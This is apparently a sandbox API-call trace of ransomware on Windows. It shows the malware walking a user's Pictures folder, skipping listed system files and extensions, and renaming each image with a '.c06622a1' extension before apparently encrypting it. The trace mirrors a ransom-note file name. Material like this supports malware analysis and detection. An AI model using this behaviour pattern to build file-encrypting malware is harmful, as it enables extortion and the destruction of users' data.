(in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\RSbMERxin-_GjeJ1DC.jpg" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\RSbMERxin-_GjeJ1DC.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\RSbMERxin-_GjeJ1DC.jpg" [0155.626] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\RSbMERxin-_GjeJ1DC.jpg") returned 0x51 [0155.626] wcscpy (in: _Dest=0x4540152, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.626] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\RSbMERxin-_GjeJ1DC.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\ax6_mndsy\\rsbmerxin-_gjej1dc.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\RSbMERxin-_GjeJ1DC.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\ax6_mndsy\\rsbmerxin-_gjej1dc.jpg.c06622a1"), dwFlags=0x8) returned 1 [0155.629] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\RSbMERxin-_GjeJ1DC.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\ax6_mndsy\\rsbmerxin-_gjej1dc.jpg.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x65c [0155.629] CreateIoCompletionPort (FileHandle=0x65c, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0155.629] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2910020 [0155.634] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7a747b45 [0155.634] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x8d9dbfd [0155.634] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x25fea2f8 [0155.634] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7edf8a32 [0155.634] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5a2d8085 [0155.634] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x343987a3 [0155.634] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3aba89ea [0155.634] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x18cfaecc [0155.637] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2910094, Length=0x80) returned 0x9dafef1f [0155.637] RtlComputeCrc32 (PartialCrc=0xef1f, Buffer=0x2910094, Length=0x80) returned 0x285f2f16 [0155.637] RtlComputeCrc32 (PartialCrc=0x2f16, Buffer=0x2910094, Length=0x80) returned 0x5eb9cbd1 [0155.637] RtlComputeCrc32 (PartialCrc=0xcbd1, Buffer=0x2910094, Length=0x80) returned 0xd204179c [0155.637] RtlComputeCrc32 (PartialCrc=0x179c, Buffer=0x2910094, Length=0x80) returned 0xb2610a36 [0155.637] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2910020) returned 1 [0155.637] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0155.637] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0155.637] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x15426210, ftCreationTime.dwHighDateTime=0x1d5e3b7, ftLastAccessTime.dwLowDateTime=0x27552b80, ftLastAccessTime.dwHighDateTime=0x1d5d864, ftLastWriteTime.dwLowDateTime=0x27552b80, ftLastWriteTime.dwHighDateTime=0x1d5d864, nFileSizeHigh=0x0, nFileSizeLow=0x6d85, dwReserved0=0x0, dwReserved1=0x0, cFileName="sEgeQA.gif", cAlternateFileName="")) returned 1 [0155.637] _wcsicmp (_Str1="sEgeQA.gif", _Str2="README.c06622a1.TXT") returned 1 [0155.638] wcsstr (_Str="sEgeQA.gif", _SubStr="README") returned 0x0 [0155.638] _wcsicmp (_Str1="autorun.inf", _Str2="sEgeQA.gif") returned -18 [0155.638] wcslen (_String="autorun.inf") returned 0xb [0155.638] _wcsicmp (_Str1="boot.ini", _Str2="sEgeQA.gif") returned -17 [0155.638] wcslen (_String="boot.ini") returned 0x8 [0155.638] _wcsicmp (_Str1="bootfont.bin", _Str2="sEgeQA.gif") returned -17 [0155.638] wcslen (_String="bootfont.bin") returned 0xc [0155.638] _wcsicmp (_Str1="bootsect.bak", _Str2="sEgeQA.gif") returned -17 [0155.638] wcslen (_String="bootsect.bak") returned 0xc [0155.638] _wcsicmp (_Str1="desktop.ini", _Str2="sEgeQA.gif") returned -15 [0155.638] wcslen (_String="desktop.ini") returned 0xb [0155.638] _wcsicmp (_Str1="iconcache.db", _Str2="sEgeQA.gif") returned -10 [0155.638] wcslen (_String="iconcache.db") returned 0xc [0155.638] _wcsicmp (_Str1="ntldr", _Str2="sEgeQA.gif") returned -5 [0155.638] wcslen (_String="ntldr") returned 0x5 [0155.638] _wcsicmp (_Str1="ntuser.dat", _Str2="sEgeQA.gif") returned -5 [0155.638] wcslen (_String="ntuser.dat") returned 0xa [0155.638] _wcsicmp (_Str1="ntuser.dat.log", _Str2="sEgeQA.gif") returned -5 [0155.638] wcslen (_String="ntuser.dat.log") returned 0xe [0155.638] _wcsicmp (_Str1="ntuser.ini", _Str2="sEgeQA.gif") returned -5 [0155.638] wcslen (_String="ntuser.ini") returned 0xa [0155.638] _wcsicmp (_Str1="thumbs.db", _Str2="sEgeQA.gif") returned 1 [0155.638] wcslen (_String="thumbs.db") returned 0x9 [0155.638] _wcsicmp (_Str1="386", _Str2="gif") returned -52 [0155.638] wcslen (_String="386") returned 0x3 [0155.638] _wcsicmp (_Str1="adv", _Str2="gif") returned -6 [0155.638] wcslen (_String="adv") returned 0x3 [0155.638] _wcsicmp (_Str1="ani", _Str2="gif") returned -6 [0155.638] wcslen (_String="ani") returned 0x3 [0155.638] _wcsicmp (_Str1="bat", _Str2="gif") returned -5 [0155.638] wcslen (_String="bat") returned 0x3 [0155.638] _wcsicmp (_Str1="bin", _Str2="gif") returned -5 [0155.638] wcslen (_String="bin") returned 0x3 [0155.638] _wcsicmp (_Str1="cab", _Str2="gif") returned -4 [0155.638] wcslen (_String="cab") returned 0x3 [0155.638] _wcsicmp (_Str1="cmd", _Str2="gif") returned -4 [0155.639] wcslen (_String="cmd") returned 0x3 [0155.639] _wcsicmp (_Str1="com", _Str2="gif") returned -4 [0155.639] wcslen (_String="com") returned 0x3 [0155.639] _wcsicmp (_Str1="cpl", _Str2="gif") returned -4 [0155.639] wcslen (_String="cpl") returned 0x3 [0155.639] _wcsicmp (_Str1="cur", _Str2="gif") returned -4 [0155.639] wcslen (_String="cur") returned 0x3 [0155.639] _wcsicmp (_Str1="deskthemepack", _Str2="gif") returned -3 [0155.639] wcslen (_String="deskthemepack") returned 0xd [0155.639] _wcsicmp (_Str1="diagcab", _Str2="gif") returned -3 [0155.639] wcslen (_String="diagcab") returned 0x7 [0155.639] _wcsicmp (_Str1="diagcfg", _Str2="gif") returned -3 [0155.639] wcslen (_String="diagcfg") returned 0x7 [0155.639] _wcsicmp (_Str1="diagpkg", _Str2="gif") returned -3 [0155.639] wcslen (_String="diagpkg") returned 0x7 [0155.639] _wcsicmp (_Str1="dll", _Str2="gif") returned -3 [0155.639] wcslen (_String="dll") returned 0x3 [0155.639] _wcsicmp (_Str1="drv", _Str2="gif") returned -3 [0155.639] wcslen (_String="drv") returned 0x3 [0155.639] _wcsicmp (_Str1="exe", _Str2="gif") returned -2 [0155.639] wcslen (_String="exe") returned 0x3 [0155.639] _wcsicmp (_Str1="hlp", _Str2="gif") returned 1 [0155.639] wcslen (_String="hlp") returned 0x3 [0155.639] _wcsicmp (_Str1="icl", _Str2="gif") returned 2 [0155.639] wcslen (_String="icl") returned 0x3 [0155.639] _wcsicmp (_Str1="icns", _Str2="gif") returned 2 [0155.639] wcslen (_String="icns") returned 0x4 [0155.639] _wcsicmp (_Str1="ico", _Str2="gif") returned 2 [0155.639] wcslen (_String="ico") returned 0x3 [0155.639] _wcsicmp (_Str1="ics", _Str2="gif") returned 2 [0155.639] wcslen (_String="ics") returned 0x3 [0155.639] _wcsicmp (_Str1="idx", _Str2="gif") returned 2 [0155.639] wcslen (_String="idx") returned 0x3 [0155.639] _wcsicmp (_Str1="ldf", _Str2="gif") returned 5 [0155.639] wcslen (_String="ldf") returned 0x3 [0155.639] _wcsicmp (_Str1="lnk", _Str2="gif") returned 5 [0155.639] wcslen (_String="lnk") returned 0x3 [0155.640] _wcsicmp (_Str1="mod", _Str2="gif") returned 6 [0155.640] wcslen (_String="mod") returned 0x3 [0155.640] _wcsicmp (_Str1="mpa", _Str2="gif") returned 6 [0155.640] wcslen (_String="mpa") returned 0x3 [0155.640] _wcsicmp (_Str1="msc", _Str2="gif") returned 6 [0155.640] wcslen (_String="msc") returned 0x3 [0155.640] _wcsicmp (_Str1="msp", _Str2="gif") returned 6 [0155.640] wcslen (_String="msp") returned 0x3 [0155.640] _wcsicmp (_Str1="msstyles", _Str2="gif") returned 6 [0155.640] wcslen (_String="msstyles") returned 0x8 [0155.640] _wcsicmp (_Str1="msu", _Str2="gif") returned 6 [0155.640] wcslen (_String="msu") returned 0x3 [0155.640] _wcsicmp (_Str1="nls", _Str2="gif") returned 7 [0155.640] wcslen (_String="nls") returned 0x3 [0155.640] _wcsicmp (_Str1="nomedia", _Str2="gif") returned 7 [0155.640] wcslen (_String="nomedia") returned 0x7 [0155.640] _wcsicmp (_Str1="ocx", _Str2="gif") returned 8 [0155.640] wcslen (_String="ocx") returned 0x3 [0155.640] _wcsicmp (_Str1="prf", _Str2="gif") returned 9 [0155.640] wcslen (_String="prf") returned 0x3 [0155.640] _wcsicmp (_Str1="ps1", _Str2="gif") returned 9 [0155.640] wcslen (_String="ps1") returned 0x3 [0155.640] _wcsicmp (_Str1="rom", _Str2="gif") returned 11 [0155.640] wcslen (_String="rom") returned 0x3 [0155.640] _wcsicmp (_Str1="rtp", _Str2="gif") returned 11 [0155.640] wcslen (_String="rtp") returned 0x3 [0155.640] _wcsicmp (_Str1="scr", _Str2="gif") returned 12 [0155.640] wcslen (_String="scr") returned 0x3 [0155.640] _wcsicmp (_Str1="shs", _Str2="gif") returned 12 [0155.640] wcslen (_String="shs") returned 0x3 [0155.640] _wcsicmp (_Str1="spl", _Str2="gif") returned 12 [0155.640] wcslen (_String="spl") returned 0x3 [0155.641] _wcsicmp (_Str1="sys", _Str2="gif") returned 12 [0155.641] wcslen (_String="sys") returned 0x3 [0155.641] _wcsicmp (_Str1="theme", _Str2="gif") returned 13 [0155.641] wcslen (_String="theme") returned 0x5 [0155.641] _wcsicmp (_Str1="themepack", _Str2="gif") returned 13 [0155.641] wcslen (_String="themepack") returned 0x9 [0155.641] _wcsicmp (_Str1="wpx", _Str2="gif") returned 16 [0155.641] wcslen (_String="wpx") returned 0x3 [0155.641] _wcsicmp (_Str1="lock", _Str2="gif") returned 5 [0155.641] wcslen (_String="lock") returned 0x4 [0155.641] _wcsicmp (_Str1="key", _Str2="gif") returned 4 [0155.641] wcslen (_String="key") returned 0x3 [0155.641] _wcsicmp (_Str1="hta", _Str2="gif") returned 1 [0155.641] wcslen (_String="hta") returned 0x3 [0155.641] _wcsicmp (_Str1="msi", _Str2="gif") returned 6 [0155.641] wcslen (_String="msi") returned 0x3 [0155.641] _wcsicmp (_Str1="pdb", _Str2="gif") returned 9 [0155.641] wcslen (_String="pdb") returned 0x3 [0155.641] _wcsicmp (_Str1="sql", _Str2="gif") returned 12 [0155.641] wcslen (_String="sql") returned 0x3 [0155.641] _wcsicmp (_Str1="sqlite", _Str2="gif") returned 12 [0155.641] wcslen (_String="sqlite") returned 0x6 [0155.641] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\ax6_mndsy")) returned 0x10 [0155.641] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0155.641] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy" [0155.641] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy") returned 0x3a [0155.641] wcscpy (in: _Dest=0x453011e, _Source="sEgeQA.gif" | out: _Dest="sEgeQA.gif") returned="sEgeQA.gif" [0155.641] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\sEgeQA.gif", dwFileAttributes=0x80) returned 1 [0155.642] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\sEgeQA.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\ax6_mndsy\\segeqa.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x680 [0155.642] SetFilePointerEx (in: hFile=0x680, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.642] ReadFile (in: hFile=0x680, lpBuffer=0x3fe674, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe704, lpOverlapped=0x0 | out: lpBuffer=0x3fe674*, lpNumberOfBytesRead=0x3fe704*=0x90, lpOverlapped=0x0) returned 1 [0155.643] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe674, Length=0x80) returned 0xe3521df9 [0155.643] RtlComputeCrc32 (PartialCrc=0x1df9, Buffer=0x3fe674, Length=0x80) returned 0x53a44910 [0155.643] RtlComputeCrc32 (PartialCrc=0x4910, Buffer=0x3fe674, Length=0x80) returned 0xa9738a60 [0155.643] RtlComputeCrc32 (PartialCrc=0x8a60, Buffer=0x3fe674, Length=0x80) returned 0xbf7f6e27 [0155.643] RtlComputeCrc32 (PartialCrc=0x6e27, Buffer=0x3fe674, Length=0x80) returned 0x865e5dd4 [0155.643] CloseHandle (hObject=0x680) returned 1 [0155.643] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45400b0 [0155.643] wcscpy (in: _Dest=0x45400b0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\sEgeQA.gif" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\sEgeQA.gif") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\sEgeQA.gif" [0155.643] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\sEgeQA.gif") returned 0x45 [0155.643] wcscpy (in: _Dest=0x454013a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.643] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\sEgeQA.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\ax6_mndsy\\segeqa.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\sEgeQA.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\ax6_mndsy\\segeqa.gif.c06622a1"), dwFlags=0x8) returned 1 [0155.645] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy\\sEgeQA.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\ax6_mndsy\\segeqa.gif.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x680 [0155.645] CreateIoCompletionPort (FileHandle=0x680, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0155.645] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x2f30020 [0155.650] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x3cfa830e [0155.650] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5aaa6497 [0155.650] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4add8c2c [0155.650] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x1052ce2e [0155.650] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x648dfa6d [0155.650] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x43544239 [0155.651] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x16b236ff [0155.651] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x34bacd88 [0155.654] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2f30094, Length=0x80) returned 0xf7386dc6 [0155.654] RtlComputeCrc32 (PartialCrc=0x6dc6, Buffer=0x2f30094, Length=0x80) returned 0xe7a10b31 [0155.654] RtlComputeCrc32 (PartialCrc=0xb31, Buffer=0x2f30094, Length=0x80) returned 0x2b793ac8 [0155.654] RtlComputeCrc32 (PartialCrc=0x3ac8, Buffer=0x2f30094, Length=0x80) returned 0xb0d10271 [0155.654] RtlComputeCrc32 (PartialCrc=0x271, Buffer=0x2f30094, Length=0x80) returned 0x4d95cbfa [0155.654] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0155.654] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0155.654] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0155.654] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9cce5f70, ftCreationTime.dwHighDateTime=0x1d5e5cb, ftLastAccessTime.dwLowDateTime=0x61d8caa0, ftLastAccessTime.dwHighDateTime=0x1d5d8dc, ftLastWriteTime.dwLowDateTime=0x61d8caa0, ftLastWriteTime.dwHighDateTime=0x1d5d8dc, nFileSizeHigh=0x0, nFileSizeLow=0x176c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XAEzSPi qgos.png", cAlternateFileName="XAEZSP~1.PNG")) returned 1 [0155.654] _wcsicmp (_Str1="XAEzSPi qgos.png", _Str2="README.c06622a1.TXT") returned 6 [0155.654] wcsstr (_Str="XAEzSPi qgos.png", _SubStr="README") returned 0x0 [0155.654] _wcsicmp (_Str1="autorun.inf", _Str2="XAEzSPi qgos.png") returned -23 [0155.654] wcslen (_String="autorun.inf") returned 0xb [0155.654] _wcsicmp (_Str1="boot.ini", _Str2="XAEzSPi qgos.png") returned -22 [0155.654] wcslen (_String="boot.ini") returned 0x8 [0155.654] _wcsicmp (_Str1="bootfont.bin", _Str2="XAEzSPi qgos.png") returned -22 [0155.654] wcslen (_String="bootfont.bin") returned 0xc [0155.654] _wcsicmp (_Str1="bootsect.bak", _Str2="XAEzSPi qgos.png") returned -22 [0155.654] wcslen (_String="bootsect.bak") returned 0xc [0155.654] _wcsicmp (_Str1="desktop.ini", _Str2="XAEzSPi qgos.png") returned -20 [0155.654] wcslen (_String="desktop.ini") returned 0xb [0155.654] _wcsicmp (_Str1="iconcache.db", _Str2="XAEzSPi qgos.png") returned -15 [0155.654] wcslen (_String="iconcache.db") returned 0xc [0155.654] _wcsicmp (_Str1="ntldr", _Str2="XAEzSPi qgos.png") returned -10 [0155.654] wcslen (_String="ntldr") returned 0x5 [0155.654] _wcsicmp (_Str1="ntuser.dat", _Str2="XAEzSPi qgos.png") returned -10 [0155.654] wcslen (_String="ntuser.dat") returned 0xa [0155.654] _wcsicmp (_Str1="ntuser.dat.log", _Str2="XAEzSPi qgos.png") returned -10 [0155.654] wcslen (_String="ntuser.dat.log") returned 0xe [0155.654] _wcsicmp (_Str1="ntuser.ini", _Str2="XAEzSPi qgos.png") returned -10 [0155.654] wcslen (_String="ntuser.ini") returned 0xa [0155.654] _wcsicmp (_Str1="thumbs.db", _Str2="XAEzSPi qgos.png") returned -4 [0155.654] wcslen (_String="thumbs.db") returned 0x9 [0155.655] _wcsicmp (_Str1="386", _Str2="png") returned -61 [0155.655] wcslen (_String="386") returned 0x3 [0155.655] _wcsicmp (_Str1="adv", _Str2="png") returned -15 [0155.655] wcslen (_String="adv") returned 0x3 [0155.655] _wcsicmp (_Str1="ani", _Str2="png") returned -15 [0155.655] wcslen (_String="ani") returned 0x3 [0155.655] _wcsicmp (_Str1="bat", _Str2="png") returned -14 [0155.655] wcslen (_String="bat") returned 0x3 [0155.655] _wcsicmp (_Str1="bin", _Str2="png") returned -14 [0155.655] wcslen (_String="bin") returned 0x3 [0155.655] _wcsicmp (_Str1="cab", _Str2="png") returned -13 [0155.655] wcslen (_String="cab") returned 0x3 [0155.655] _wcsicmp (_Str1="cmd", _Str2="png") returned -13 [0155.655] wcslen (_String="cmd") returned 0x3 [0155.655] _wcsicmp (_Str1="com", _Str2="png") returned -13 [0155.655] wcslen (_String="com") returned 0x3 [0155.655] _wcsicmp (_Str1="cpl", _Str2="png") returned -13 [0155.655] wcslen (_String="cpl") returned 0x3 [0155.655] _wcsicmp (_Str1="cur", _Str2="png") returned -13 [0155.655] wcslen (_String="cur") returned 0x3 [0155.655] _wcsicmp (_Str1="deskthemepack", _Str2="png") returned -12 [0155.655] wcslen (_String="deskthemepack") returned 0xd [0155.655] _wcsicmp (_Str1="diagcab", _Str2="png") returned -12 [0155.655] wcslen (_String="diagcab") returned 0x7 [0155.655] _wcsicmp (_Str1="diagcfg", _Str2="png") returned -12 [0155.655] wcslen (_String="diagcfg") returned 0x7 [0155.655] _wcsicmp (_Str1="diagpkg", _Str2="png") returned -12 [0155.655] wcslen (_String="diagpkg") returned 0x7 [0155.655] _wcsicmp (_Str1="dll", _Str2="png") returned -12 [0155.655] wcslen (_String="dll") returned 0x3 [0155.656] _wcsicmp (_Str1="drv", _Str2="png") returned -12 [0155.656] wcslen (_String="drv") returned 0x3 [0155.656] _wcsicmp (_Str1="exe", _Str2="png") returned -11 [0155.656] wcslen (_String="exe") returned 0x3 [0155.656] _wcsicmp (_Str1="hlp", _Str2="png") returned -8 [0155.656] wcslen (_String="hlp") returned 0x3 [0155.656] _wcsicmp (_Str1="icl", _Str2="png") returned -7 [0155.656] wcslen (_String="icl") returned 0x3 [0155.656] _wcsicmp (_Str1="icns", _Str2="png") returned -7 [0155.656] wcslen (_String="icns") returned 0x4 [0155.656] _wcsicmp (_Str1="ico", _Str2="png") returned -7 [0155.656] wcslen (_String="ico") returned 0x3 [0155.656] _wcsicmp (_Str1="ics", _Str2="png") returned -7 [0155.656] wcslen (_String="ics") returned 0x3 [0155.656] _wcsicmp (_Str1="idx", _Str2="png") returned -7 [0155.656] wcslen (_String="idx") returned 0x3 [0155.656] _wcsicmp (_Str1="ldf", _Str2="png") returned -4 [0155.656] wcslen (_String="ldf") returned 0x3 [0155.656] _wcsicmp (_Str1="lnk", _Str2="png") returned -4 [0155.656] wcslen (_String="lnk") returned 0x3 [0155.656] _wcsicmp (_Str1="mod", _Str2="png") returned -3 [0155.656] wcslen (_String="mod") returned 0x3 [0155.656] _wcsicmp (_Str1="mpa", _Str2="png") returned -3 [0155.656] wcslen (_String="mpa") returned 0x3 [0155.656] _wcsicmp (_Str1="msc", _Str2="png") returned -3 [0155.656] wcslen (_String="msc") returned 0x3 [0155.656] _wcsicmp (_Str1="msp", _Str2="png") returned -3 [0155.656] wcslen (_String="msp") returned 0x3 [0155.656] _wcsicmp (_Str1="msstyles", _Str2="png") returned -3 [0155.656] wcslen (_String="msstyles") returned 0x8 [0155.656] _wcsicmp (_Str1="msu", _Str2="png") returned -3 [0155.656] wcslen (_String="msu") returned 0x3 [0155.657] _wcsicmp (_Str1="nls", _Str2="png") returned -2 [0155.657] wcslen (_String="nls") returned 0x3 [0155.657] _wcsicmp (_Str1="nomedia", _Str2="png") returned -2 [0155.657] wcslen (_String="nomedia") returned 0x7 [0155.657] _wcsicmp (_Str1="ocx", _Str2="png") returned -1 [0155.657] wcslen (_String="ocx") returned 0x3 [0155.657] _wcsicmp (_Str1="prf", _Str2="png") returned 4 [0155.657] wcslen (_String="prf") returned 0x3 [0155.657] _wcsicmp (_Str1="ps1", _Str2="png") returned 5 [0155.657] wcslen (_String="ps1") returned 0x3 [0155.657] _wcsicmp (_Str1="rom", _Str2="png") returned 2 [0155.657] wcslen (_String="rom") returned 0x3 [0155.657] _wcsicmp (_Str1="rtp", _Str2="png") returned 2 [0155.657] wcslen (_String="rtp") returned 0x3 [0155.657] _wcsicmp (_Str1="scr", _Str2="png") returned 3 [0155.657] wcslen (_String="scr") returned 0x3 [0155.657] _wcsicmp (_Str1="shs", _Str2="png") returned 3 [0155.657] wcslen (_String="shs") returned 0x3 [0155.657] _wcsicmp (_Str1="spl", _Str2="png") returned 3 [0155.657] wcslen (_String="spl") returned 0x3 [0155.657] _wcsicmp (_Str1="sys", _Str2="png") returned 3 [0155.657] wcslen (_String="sys") returned 0x3 [0155.657] _wcsicmp (_Str1="theme", _Str2="png") returned 4 [0155.657] wcslen (_String="theme") returned 0x5 [0155.657] _wcsicmp (_Str1="themepack", _Str2="png") returned 4 [0155.657] wcslen (_String="themepack") returned 0x9 [0155.657] _wcsicmp (_Str1="wpx", _Str2="png") returned 7 [0155.657] wcslen (_String="wpx") returned 0x3 [0155.657] _wcsicmp (_Str1="lock", _Str2="png") returned -4 [0155.657] wcslen (_String="lock") returned 0x4 [0155.657] _wcsicmp (_Str1="key", _Str2="png") returned -5 [0155.657] wcslen (_String="key") returned 0x3 [0155.657] _wcsicmp (_Str1="hta", _Str2="png") returned -8 [0155.657] wcslen (_String="hta") returned 0x3 [0155.657] _wcsicmp (_Str1="msi", _Str2="png") returned -3 [0155.657] wcslen (_String="msi") returned 0x3 [0155.657] _wcsicmp (_Str1="pdb", _Str2="png") returned -10 [0155.658] wcslen (_String="pdb") returned 0x3 [0155.658] _wcsicmp (_Str1="sql", _Str2="png") returned 3 [0155.658] wcslen (_String="sql") returned 0x3 [0155.658] _wcsicmp (_Str1="sqlite", _Str2="png") returned 3 [0155.658] wcslen (_String="sqlite") returned 0x6 [0155.658] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_nlnf\\ax6_mndsy")) returned 0x10 [0155.658] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0155.658] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy" [0155.658] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_nLNF\\AX6_mnDSy") returned 0x3a [0155.658] wcscpy (in: _Dest=0x453011e, _Source="XAEzSPi qgos.png" | out: _Dest="XAEzSPi qgos.png") returned="XAEzSPi qgos.png" [0155.658] SetFileAttributesW 